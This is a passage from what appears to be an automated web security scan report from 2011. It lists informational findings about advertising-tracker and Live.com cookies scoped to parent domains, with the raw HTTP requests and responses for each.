nTvQtfx1hoOTfOMmfS3Iu8AOgikXw8fJIq24TTJK/JfU/Kle1+vzZrBlMFh5Afh1qja0MHBO6o+I1PtKJQkEvLHnUFNuI1LX3W76LssPpRcxqeQ0ico/22esLnjurcGcDzkCt8bxzJ0XCy/hxiYaQZj2c4odprBmARwbAGMFZ8XvyF9xuey67n6bQ9ndxHRkFxXSB8dj6BtCWdaj26k4HJebjrba5UFlvfK/uYH+hSNaB5lc8Lpoo34WHmy+EwTtbDTZe8sX09JNOtDEt7CSh7a5ud1hDn0gOtf6iySYsT7jV2PnEs4dkVQ8ICOwhNBN2tYE95VOLcCOn36yldnpYLJbjXs58A7OAHop2IpDc4m8280xku0k8oHIeR5AC5BKl+RhW5IMqrDwA8arsFlx/IxAe6T991EglpgFwoUTNNOKD39is3z9p5xBjEuwn0SIYIO/65chkmsaj0lw74GfX4hNA3WhKg==; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq0c2Vdvfoyq2gE65uykjGK8DI0fQ6W0LZV/KMW+bsDCKsOfz+Ch73anSmjzQ4N2mtfQACJzfk9EWBNM9K5yTbQDP/ZDJ/8zYyErcuaX/MTs1RU5N5DeU0aAmkpYJ9thW/Hya0qFvYladCiAuWtUPOrqpcyHKJPhFT9S9HCVHVMj3nZyx0z/91FO96gSu1bjwC1k54v0ek3ge3GY4Tosdejf4GUDkRMDeGtP/O/P23UhOcwcG29rPMIxD0imB5ApBEJHRsYN43ewlfT9vlcTTPx3Qihj66o/Chm4BPtAk9t25PfQLvbLkRSsruCX9+OdKjyYq+SzvBRWlhHPO8ZSqSXntrC0QOntJkQEIKIuYAC6+qY93TunGvCP99YcUu3CJVkmsbYN+Z5/84Q1V3ByyguogZxtBkUNrBOObpCkTAXnHmtBZu5Kqm7rHy9fTkErq2IhUY1YJqszajUzu0pnqOVrr8jTIo2TEJtgt3BdnvhPEhCLoK/tNiYa8XArAO/qbLAzFHFwe3eti49gHeYkMoRyy6gVrH5qdgFcqa0YlQJiQ8XgE2XCYqnJsDnGrEFxVz5s8Y6t369w9ih76FWbImv5nAazRPQE+R15Ge7Ar1R2tkE7fuLhxj0De9ywsX84Hqjq0nGEK4HZczwHAWH7HMyIqhm4sGgPjSpwGvB8dhrk2yXb7nG3qYnMLWeIXiuyNlCi5rjvnpEfQBOFLGvK9HN8srFj0xIopOeHeqR+QvHGiHzBpPF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4z+huXIMH/C1v6FY5BD9CU6du67BSrLzzGDKYyVi7wuMG8EbAQsYoAM+8HjFdJuNxGA3/+CrpcbtEHZ/d6C7jbvv7M0vNWHRu7UTOWGMPgDtQnUJM+3UN3RAdHmCWWZdidYJ29FVf84FRt54yfn0DxXbewqnOCDFkhcpfrbm9qrWCYvAexDPzC3J2PvZfsy0paqKtZwkSPNwYDH58Nnxwd6fWe5R4HtXeze5eYPpOFwxneozVU7HcSJhRznJKY+nbXFV4Kh9TuLjJidiEALKqZqYEUfWBBwCHLNgWNCsDVbbrOurIU2np0szXUis/sUiQzf0Wf6hEdcVHk25x1YopVaDeVCwaNCIsECWnmpdYStYgcflX2fOyqpvQXpFuKLMZM26a7Cnv+bGk86zFfrtsmZ+XUjOCjCgV9VZAJLI6r/wby1TkeEYM4aKVRAcjOSNaSUouN6aq0UDfofVwofJbdaDfqnlskad6jL2nkV2oqYYN51bbjRrBJ5Zx/iFkNxeA80dBln8t7npPdnnutFI020xW6Pikz/y3wzF3Zn7ODNfmnnrXoxV2IA89MfIixDVxod6TnBvbAyjrHfxPZXpR9VpSkdunpDbZbQ0tkL4iwjlo4ovwa0wlZD7dl0qzpqpDVDzgG/K5a0fKdDgHqN06JXJDXihsaxG61k8V69rDg9gZRx72LYSDFbS+5iLzyhgdsmnsBb9i/GVpAizi/0VFp8PPCMlLuz7hDOGo+yUwLowBr0K6Cp6; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NyEJZgpn3xSpL5u85NM5XwnsM3MjKdVcqB/a12JILatz1/QkamTspbLrwKiJ0kHW/5AU3oTEjmWXYWp2M0xUL7+WY6kjOrURsVDi62hpYV7xR6QBhj0v+pyJD3OJXK+vmR6dmK3bv866m5dV/8S0o9vxNmpKALSQclbLyFOiUbYzEkzSx6gD/xYdErrYRbvJrxQrHocSZW8IWgCBo1ZMKF3XAoyFrdWONbkKqPtnL+Tf6LeOnc/8RbibirISpR8EIRZg0bai/lhsQDUpwOFeZfVq4ADms+6bYXKqD9JyHXg0ZwDRrCWhBl1ue1BqVAn3Cr/Bwx8/fgf4osdRhn5YjD5/Y+PY6RExqP8RcxgTNdXx9V9Xq7fP8/CxpD2d4Ncg3Lwb6WRoh1vRm87/tMbWsUCyqUEjHcs9AEPUYjcC1xfTW9GtjTlaABUuUrmGg2itWP7OmRmHnGY1AG7z8DLn/+VDv99nV2ZqSoL3ECBGo5Gp+CmR/+82s/rVel/YnKz/XNzeezOmflNl/ISF2iEFYbSKl4jL2Imw3DcEFYr9gLF7thJxa959CXKjgznlBeDDDam6bQwtXdKwxq68WOD0JfNzPCFtxZ/3ySVIchlyyEMGK4ru9sNL2qhk7ThVsbKzGx3w5WC0tnxRyUM3wF7AFcroI1cVBCQX8UDlCNyuqP1eE9UH0lr8hQ9hH+eytjUTNHl50185XTe8k2I3KTCCC3V/1YUfM3sjwXon8qbgHnWylig/Q/P3gvmTN1uk6+gMf23SzvcZzS2JaZu1hhHc+zLEUQhUX2B2WD2Z1IAQyoj7hwalxN8UjEjE7dDYbkp4UpLD0vea8xMx8AwMSMuOMW+Z2BchxPI3ARZVxVwzU05RiwmP6YN1SIAvcXyk/FKuWo/NY4fTMv4mW6J5GkV7KsoK7zESEFXHC80l/FUrlSjwrgH0F9A4HdrSoCRnacUxrlabJk/bO0nQFQyClplYm45GteUUvB/yFXNWhchR5qNmBBeTnsuLjYG2ZjDj6+gYIPScc6ZJn5y6xJkKyqQDU5eYo9ZDplLH4wjRzgjncZs4b1iuMC4fjmTdUR2cDevLyGC3/dRJ9CcLuov2969ADUaV4qAQC5BiHySEoWnqc2ShEOSXAgSIgS+Eyh1EA8cPHs3CbYp/uQxx+SM1MwVT6OSTygbQTsYBbCJypY6WyLXo8mxytLhWadmEeayScWgFbHGuePFAPRquVFh96dbbF5M9RbLfAuQyLYtEa3eG+mkoAieeEZCt2m5a7NTx+Uc439ZXTiwJlFAahJEUocKPD9gyhsQNp2rpsEhJ5rdXhEIM/fln0zgalBbUBFpcvKtyWA77bjY7eCKH+sdgen0EQayIsR5HPAfq1y0RBst2xOjuOSxHlOrL8RmhvQ35RlgS+Gu73AjceiwRh0Gx1dj9Xu8+xiv2kDaH6RU9nKl1BpSf7tIpjrzjwxE1fe8GeNTkLApO3Ur7SMEtDlGU5e5U7wmQj6TKeaRm1dY/vSYq5TyKIflCXtQZmxEGf//KOjvsyVR3ZP7NK8+AbLMCSQD/OBWjetrucXmOEL9RMLrHQxXH9Vv+WOn5ixorNpStZnFCUQfrej5ibwjEcSVi1fs/7GL5+pUQywVqWob0fcbGF9zOLQJ+tj/rvPzhJXq0YA4x44xOK4w+z2tzIqlkpP+ikADD0I5fH5/0uGt4NbQGMW+JgHWCG9VlVWXq4Fy2CDkyduwyGzBgAyNcK2AcbCUfHePahhOHbixQW0gkUIyYnNVjqJn0tZ9IIQWmk2ynyVd+Eo3kixBSz6KvdGSg8RlOtZl3zHXogg==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:40 GMT
Content-Length: 1254

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72133','D08734_72099','D08734_72131','D08734_72435','D08734_72581','D08734_72639','D08734_72674
...[SNIP]...

13.83. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EMEBPQGhB4HzDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA; expires=Mon, 17-Oct-2011 20:21:30 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=498634369;fpan=1;fpa=P0-1586148760-1311106896347;ns=0;url=http%3A%2F%2Frealnetworks.com%2F;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=;dst=1;et=1311106896345;tzo=300;a=p-bb8mwEIppbU2c HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: mc=4e092e22-03827-7415b-42309; d=EOABPQGgB4HTDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMEBPQGhB4HzDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA; expires=Mon, 17-Oct-2011 20:21:30 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 19 Jul 2011 20:21:30 GMT
Server: QS

13.84. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1%262372%3D1%262190%3D1%262189%3D1%262765%3D1%262374%3D1; expires=Sun, 15-Jan-2012 20:27:49 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||2190||2111|0||2494|0||2189||3577|0||2765||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; put_2211=2814750682866683; rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265852%3D12124%2C721%2C3%2C%2C%266432%3D12470%2C499%2C2%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C%267259%3D13546%2C0%2C1%2C%2C%26733%3D13546%2C0%2C1%2C%2C%264706%3D13548%2C0%2C4%2C%2C; cd=false; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1%262372%3D1%262190%3D1%262189%3D1%262765%3D1%262374%3D1; expires=Sun, 15-Jan-2012 20:27:49 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.85. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
put_2211=2814750682866683; expires=Wed, 20-Jul-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7259&nid=2211&put=2814750682866683&expires=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; khaos=GOVBRMNC-I-DXQD; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C; rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11993%2C1032%2C4%2C%2C%265852%3D12124%2C721%2C3%2C%2C%266432%3D12470%2C499%2C2%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C%267259%3D13546%2C0%2C2%2C%2C%26733%3D13546%2C0%2C1%2C%2C; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2211=2814750682866683; expires=Wed, 20-Jul-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.86. http://profile.live.com/badge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

E=P:/gMMiDcUzog=:5crcRXHCG/JAHLgCxcxWv/ztBWJ2uFCnSl1koMpH+wA=:F; domain=.live.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; sc_clustbl_142=28912e9907a99869; wlidperf=throughput=2&latency=1306

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311085824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: f33f9185-5f49-4875-b2f2-281495bcb886
Set-Cookie: E=P:/gMMiDcUzog=:5crcRXHCG/JAHLgCxcxWv/ztBWJ2uFCnSl1koMpH+wA=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 19-Jul-2011 12:50:24 GMT; path=/
Set-Cookie: SABadge=msg=&url=http%3a%2f%2fwww.factset.com%2fproducts%2fprivateequity&title=&description=&screenshot=&ctype=link&swfurl=&height=&width=&emv=; expires=Wed, 20-Jul-2011 14:30:24 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=00989dfb1d824c3c; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC613 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:24 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311085824&rver=6.1.6206.0&wp=MBI&wrep
...[SNIP]...

13.87. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

